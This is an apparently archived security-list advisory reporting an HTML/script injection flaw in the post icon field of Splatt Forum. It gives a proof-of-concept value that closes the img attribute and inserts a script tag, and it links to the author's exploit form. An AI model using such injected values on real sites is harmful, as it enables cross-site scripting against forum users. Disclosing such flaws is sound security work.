Splatt Forum html injection code in post icon

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


Any user can inject html code when create a new post.
The bug are in the post icon:
<img src="icon.gif" etc.>
If you create a personalized form with this code:
icon.gif"><script>alert('bug');<script><any
tag="
the final code of the post icon is:
<img
src="icon.gif"><script>alert('bug');<script><any
tag="" etc.>

The exploit form is here:
http://members.fortunecity.it/lethalman2002/bugs/splatt.html

by Lethal Lab (Lethalman)
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux